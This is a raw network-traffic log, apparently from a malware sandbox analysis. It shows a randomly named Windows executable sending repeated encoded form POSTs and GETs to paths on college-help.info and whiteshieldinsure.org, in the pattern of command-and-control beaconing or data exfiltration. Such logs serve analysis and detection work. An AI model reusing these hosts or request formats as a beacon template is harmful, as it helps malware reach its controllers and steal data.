                                                                      Nov 6, 2024 05:22:27.479537964 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.64999138.88.82.56804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:29.333177090 CET786OUTPOST /wm94/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.college-help.info
                                                                      Origin: http://www.college-help.info
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.college-help.info/wm94/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 32 6d 36 61 6a 69 45 6e 66 6e 7a 45 38 4b 50 32 49 55 54 4a 4d 67 79 6e 2b 2f 46 2b 32 5a 37 67 76 52 4b 6c 4b 6f 4f 35 33 6a 32 67 53 50 44 34 67 42 51 54 62 52 47 6c 6b 4f 45 76 39 33 4e 43 47 70 6f 4d 48 5a 4c 70 4d 6b 53 37 50 6d 33 79 68 4c 72 51 52 71 69 59 53 6c 45 41 4c 6f 79 6c 6c 67 56 4c 53 6c 48 51 50 73 4f 5a 57 6c 68 52 2f 4e 32 37 37 59 54 43 4f 41 42 4e 51 32 6d 68 4c 4a 2b 73 37 44 44 48 65 62 71 73 50 6b 47 6f 6a 46 42 55 6b 66 66 66 4a 6c 48 4c 6b 33 38 51 4e 42 78 76 75 6f 59 68 6b 6a 67 38 33 56 6b 52 6b 38 75 65 62 54 61 55 6c 41 4e 35 4b 2f 44 6c 2b 56 78 38 6e 31 6b 49 64 2f 6b 38 68 57 6a 49 4b 35 47 73 4b 54 79 52 7a 34 61 34 4e 46 78 54 45 67 3d 3d
                                                                      Data Ascii: 08rl=2m6ajiEnfnzE8KP2IUTJMgyn+/F+2Z7gvRKlKoO53j2gSPD4gBQTbRGlkOEv93NCGpoMHZLpMkS7Pm3yhLrQRqiYSlEALoyllgVLSlHQPsOZWlhR/N277YTCOABNQ2mhLJ+s7DDHebqsPkGojFBUkfffJlHLk38QNBxvuoYhkjg83VkRk8uebTaUlAN5K/Dl+Vx8n1kId/k8hWjIK5GsKTyRz4a4NFxTEg==
                                                                      Nov 6, 2024 05:22:30.016262054 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:22:29 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 04 Nov 2024 18:50:02 GMT
                                                                      ETag: "49d-6261ac0a04ab1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1181
                                                                      Content-Type: text/html
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                      Nov 6, 2024 05:22:30.016283989 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.64999238.88.82.56804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:31.870769024 CET1799OUTPOST /wm94/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.college-help.info
                                                                      Origin: http://www.college-help.info
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.college-help.info/wm94/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 32 6d 36 61 6a 69 45 6e 66 6e 7a 45 38 4b 50 32 49 55 54 4a 4d 67 79 6e 2b 2f 46 2b 32 5a 37 67 76 52 4b 6c 4b 6f 4f 35 33 6a 2b 67 53 38 4c 34 68 6d 4d 54 59 52 47 6c 6e 4f 45 69 39 33 4d 51 47 70 77 49 48 5a 50 54 4d 68 57 37 4e 46 50 79 74 70 44 51 66 71 69 59 4e 31 45 42 54 49 79 4b 6c 68 6c 50 53 6c 58 51 50 73 4f 5a 57 6a 6c 52 76 76 53 37 67 59 54 44 45 67 42 42 55 32 6d 46 4c 4a 6e 58 37 44 50 78 65 71 4b 73 50 45 57 6f 67 7a 31 55 74 66 66 64 49 6c 47 57 6b 33 67 31 4e 42 74 46 75 72 46 47 6b 6a 55 38 32 77 46 77 35 4d 69 46 50 77 71 46 39 6a 74 73 47 70 48 42 37 30 35 66 73 6c 4d 4d 55 66 68 53 76 53 76 53 4c 37 79 71 44 68 61 2b 2f 6f 6e 4b 4f 78 38 4d 51 74 34 41 4f 4e 79 4a 6f 30 31 49 58 46 37 43 37 58 67 50 36 32 45 4c 31 50 6a 50 2b 65 49 71 35 73 52 31 4a 6f 45 37 6b 75 33 4e 6a 4d 55 45 43 57 51 42 39 47 4a 30 52 73 78 78 4c 31 42 76 59 39 50 57 4e 77 49 52 7a 4a 45 70 43 64 50 65 4c 70 32 34 53 7a 79 72 6b 35 57 67 51 34 46 77 67 34 69 59 74 45 6c 70 41 50 58 70 66 [TRUNCATED]
                                                                      Data Ascii: 08rl=2m6ajiEnfnzE8KP2IUTJMgyn+/F+2Z7gvRKlKoO53j+gS8L4hmMTYRGlnOEi93MQGpwIHZPTMhW7NFPytpDQfqiYN1EBTIyKlhlPSlXQPsOZWjlRvvS7gYTDEgBBU2mFLJnX7DPxeqKsPEWogz1UtffdIlGWk3g1NBtFurFGkjU82wFw5MiFPwqF9jtsGpHB705fslMMUfhSvSvSL7yqDha+/onKOx8MQt4AONyJo01IXF7C7XgP62EL1PjP+eIq5sR1JoE7ku3NjMUECWQB9GJ0RsxxL1BvY9PWNwIRzJEpCdPeLp24Szyrk5WgQ4Fwg4iYtElpAPXpf1dv/8k8ve2iDH/dWK7YRdgsfUw6GIFaAGWMye6kYMZg6thODGqzeQVOzpPCcnc9kosLOatHMSEIh798hp+busnqfnX9lmHtgx4p4t2J2ZVqpctVfMkzIQRmqBj7y4rOcNcPZY9Of4Wyy19gYTWt1orYqVi4F1iICyNcEvIIWakKuSMgjbYV06yXJS4R6urw9d7N6Gvg1pVPKSoV054hJp5JR8Y6CBnHgPHNGZ3iBalZKqY7YyNX+IqQnsho/wRun2zrCO3Lk8h+5lY9gbNasXJss3Uesr08CGJeFpwh8Ut9t0yQ78NCz5DA5A6OYRuLv7tkSl5tMoKPJZNzdTgHZWVaMULt+5bhXOmTx7LEQNWArehmSfXQTErt657FUk8CGhAjlBk0n2STi0vTKnihbfs7wl2e3V/RCg1xqGABHcpo/9NjbeQODIxQU77xLhYmAG9nzpWY6A8iVSFZmAKjnLFQFMJk1HAZiOzC9Mnxfy6SjNlDu76icL5c/TySgb5WGr+DfXf/+1EegQLwSJZNDmUuwxQ+pBb7l91dALBC4/YbGSGrP9qXKH8b8nfp5KaXRZxQUQimFK+Ve+yVG/UxCP8iJdShF/8lVDWcOFrd7CTY4/KjAfsAhC188z++ySi8VU8oDPuD0cOPfdHtjmWCgQo70RBiYFPYJiq [TRUNCATED]
                                                                      Nov 6, 2024 05:22:32.586015940 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:22:32 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 04 Nov 2024 18:50:02 GMT
                                                                      ETag: "49d-6261ac0a04ab1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1181
                                                                      Content-Type: text/html
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                      Nov 6, 2024 05:22:32.586035967 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      8192.168.2.64999338.88.82.56804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:34.418087959 CET491OUTGET /wm94/?08rl=7kS6gWg4TGPkiMLuCHnIHRTQ3qYM06eaigrXILamhmyeZN//hX0ZBV/Jvv1z6XxjKqArJvf1S0/GIkuUkrvXIITmY0x+We/Q9CJ8aFTCC7CnYVlt7PWp/pqkdTJVVi6hLa/q3Tk=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.college-help.info
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:22:35.107903957 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:22:35 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 04 Nov 2024 18:50:02 GMT
                                                                      ETag: "49d-6261ac0a04ab1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1181
                                                                      Content-Type: text/html
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
                                                                      Nov 6, 2024 05:22:35.107922077 CET185INData Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34
                                                                      Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      9192.168.2.6499943.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:40.202447891 CET774OUTPOST /3fus/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.whiteshieldinsure.org
                                                                      Origin: http://www.whiteshieldinsure.org
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.whiteshieldinsure.org/3fus/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 31 54 66 2b 55 61 2b 54 6b 61 34 47 55 6e 75 6a 34 46 76 43 32 76 4c 71 75 73 69 43 34 2b 58 45 59 48 79 71 77 31 55 32 33 41 37 6c 57 79 68 73 54 6d 79 50 61 68 42 57 35 74 6b 68 59 2f 49 5a 4e 6b 41 33 36 34 57 61 71 43 64 79 35 65 63 77 6b 48 69 6b 30 31 46 54 4c 4d 44 4a 53 6b 5a 79 48 4e 2b 6e 36 37 6c 2f 54 41 45 73 39 5a 65 31 50 58 52 70 67 35 42 50 69 66 52 64 62 41 78 36 49 4f 6b 68 73 6d 56 4a 50 2b 55 57 54 6c 70 72 55 73 77 61 4f 5a 35 2f 55 72 33 69 58 50 79 65 49 57 53 6c 4d 4a 57 2f 64 4d 35 6f 6c 39 61 47 57 77 78 79 57 34 50 4a 5a 52 6d 4d 61 6f 30 34 62 50 6a 78 48 54 61 53 54 6a 68
                                                                      Data Ascii: 08rl=A1Tf+Ua+Tka4GUnuj4FvC2vLqusiC4+XEYHyqw1U23A7lWyhsTmyPahBW5tkhY/IZNkA364WaqCdy5ecwkHik01FTLMDJSkZyHN+n67l/TAEs9Ze1PXRpg5BPifRdbAx6IOkhsmVJP+UWTlprUswaOZ5/Ur3iXPyeIWSlMJW/dM5ol9aGWwxyW4PJZRmMao04bPjxHTaSTjh


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.6499953.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:42.854130983 CET798OUTPOST /3fus/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.whiteshieldinsure.org
                                                                      Origin: http://www.whiteshieldinsure.org
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.whiteshieldinsure.org/3fus/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 31 54 66 2b 55 61 2b 54 6b 61 34 48 33 76 75 75 37 74 76 48 57 76 49 7a 4f 73 69 56 6f 2f 51 45 59 62 79 71 78 42 2b 31 46 6b 37 6c 32 69 68 74 57 47 79 63 71 68 42 65 5a 73 73 76 34 2f 42 5a 4e 6f 6d 33 2b 6b 57 61 71 57 64 79 38 69 63 77 56 48 39 72 45 31 48 63 72 4d 37 57 69 6b 5a 79 48 4e 2b 6e 36 2b 74 2f 54 59 45 73 74 4a 65 7a 65 58 53 6b 41 35 47 5a 79 66 52 50 72 41 39 36 49 4f 57 68 70 47 37 4a 4d 57 55 57 57 42 70 71 42 59 78 55 2b 5a 67 67 45 71 34 70 6d 65 57 47 65 48 55 6a 39 4e 76 2f 74 45 2f 70 54 67 41 61 6c 77 53 67 47 59 4e 4a 62 4a 55 4d 36 6f 65 36 62 33 6a 6a 51 66 39 64 6e 47 43 64 57 67 4b 39 49 39 64 44 77 37 7a 39 58 47 62 73 4e 52 63 4f 51 3d 3d
                                                                      Data Ascii: 08rl=A1Tf+Ua+Tka4H3vuu7tvHWvIzOsiVo/QEYbyqxB+1Fk7l2ihtWGycqhBeZssv4/BZNom3+kWaqWdy8icwVH9rE1HcrM7WikZyHN+n6+t/TYEstJezeXSkA5GZyfRPrA96IOWhpG7JMWUWWBpqBYxU+ZggEq4pmeWGeHUj9Nv/tE/pTgAalwSgGYNJbJUM6oe6b3jjQf9dnGCdWgK9I9dDw7z9XGbsNRcOQ==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.6499963.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:45.404195070 CET1811OUTPOST /3fus/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.whiteshieldinsure.org
                                                                      Origin: http://www.whiteshieldinsure.org
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.whiteshieldinsure.org/3fus/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 41 31 54 66 2b 55 61 2b 54 6b 61 34 48 33 76 75 75 37 74 76 48 57 76 49 7a 4f 73 69 56 6f 2f 51 45 59 62 79 71 78 42 2b 31 46 73 37 6c 6c 61 68 76 33 47 79 66 71 68 42 43 4a 73 74 76 34 2b 42 5a 4e 67 71 33 35 73 73 61 70 75 64 7a 5a 75 63 32 6e 6a 39 77 30 31 48 5a 62 4d 41 4a 53 6b 41 79 48 64 36 6e 36 4f 74 2f 54 59 45 73 72 4e 65 69 50 58 53 6d 41 35 42 50 69 66 72 64 62 42 69 36 49 47 47 68 70 43 46 4b 38 32 55 52 77 68 70 73 33 45 78 57 65 5a 69 6a 45 72 6e 70 6d 53 4a 47 61 66 32 6a 39 35 46 2f 71 30 2f 6b 48 56 72 49 56 6f 61 36 77 64 67 65 6f 78 69 43 66 45 41 39 59 62 2f 6e 6d 58 72 57 44 32 57 46 53 55 78 79 71 49 43 44 77 76 6f 35 42 7a 30 36 2b 49 52 4d 37 71 61 2f 37 68 41 43 69 5a 74 38 75 2f 61 6a 6d 74 7a 34 6e 52 6b 55 56 41 6f 30 71 69 6a 36 54 48 4f 62 59 47 51 57 37 42 51 4c 68 6c 77 6a 32 30 61 72 53 58 67 41 48 67 71 4c 67 56 41 33 58 59 5a 51 33 77 6c 5a 66 47 4e 4a 4a 34 68 77 5a 45 4e 66 6f 69 6d 31 71 44 6a 42 47 79 37 4f 79 2f 44 4d 65 77 35 41 56 6d 52 64 [TRUNCATED]
                                                                      Data Ascii: 08rl=A1Tf+Ua+Tka4H3vuu7tvHWvIzOsiVo/QEYbyqxB+1Fs7llahv3GyfqhBCJstv4+BZNgq35ssapudzZuc2nj9w01HZbMAJSkAyHd6n6Ot/TYEsrNeiPXSmA5BPifrdbBi6IGGhpCFK82URwhps3ExWeZijErnpmSJGaf2j95F/q0/kHVrIVoa6wdgeoxiCfEA9Yb/nmXrWD2WFSUxyqICDwvo5Bz06+IRM7qa/7hACiZt8u/ajmtz4nRkUVAo0qij6THObYGQW7BQLhlwj20arSXgAHgqLgVA3XYZQ3wlZfGNJJ4hwZENfoim1qDjBGy7Oy/DMew5AVmRdgB7SmZQSiK5GaLs++VWGJYudnHixniZ9l6d2Eq6+ioUBC4TZWYmscvVKkWzjCQCazY8R2V8isNW7qKFdddd6SM4s1niezSBQnkYO7Gm+dJ5qVWeFaWz0xxrbDBjPjiRwy8tv7w3xXFevikiuaM4l2rxcDELd1FuKSb1IaZK8JRrbDxv5LZJaDqaDPU7EV2K5IWsaXIszgPfXka341sPGVknhSOGwBV7dxbPnQNMNW9vcg62vxzxe3TGzUteKh572+oVItO8V2WLhXleOW3zfMTZSREC0XS4OQsFT5uY78USdISItUmM7NVoRPZIGRDrk7eo0+M8D/fD5pT2nq9r8I9fhQOX/MS2tvTUSTnUHu/j4upbj4pFwhbTf+9IOJl5GGm+7nre0HpBHNlfbGd6FUI58zGw6WdauBRiy1qR4nzgyhZaJ0Xc6aC6VajB2wl1rRhbOY060VZg2PtLROW7Svj+igs0zByNsX4bHAX2lg1Q1SwUX+VIlkOR8AL8sfM7147k7WYvlKs/1hWlxPS3b8h2B9KQ7UXZDNhfIqO7NSpiNNjDnb/ulxjJEg18yz9XI/VbpJfKD4qzUxDC1FpIeaKYh9hGd6FMPHZBVPXukt0Byeb5juWrq6jqVMG+eszS9xb9LxQqFFXEQlJPPRGJBB5xSjyNj5zwTQ0 [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.6499983.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:47.954143047 CET495OUTGET /3fus/?IrPLc=Knb4R&08rl=N37/9h28dFqTFTbynIc+O1znseVxHIXZE7DXniB1wngIxlCrnEyOGvsAdKxjrp67etIg8JUbEYHl+7CXxm3m2jtEXrZrKAlhk2xQwbijvW4W0bJjguvuk21AJD3IIpJr9ZOXnsQ= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.whiteshieldinsure.org
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:22:49.499651909 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
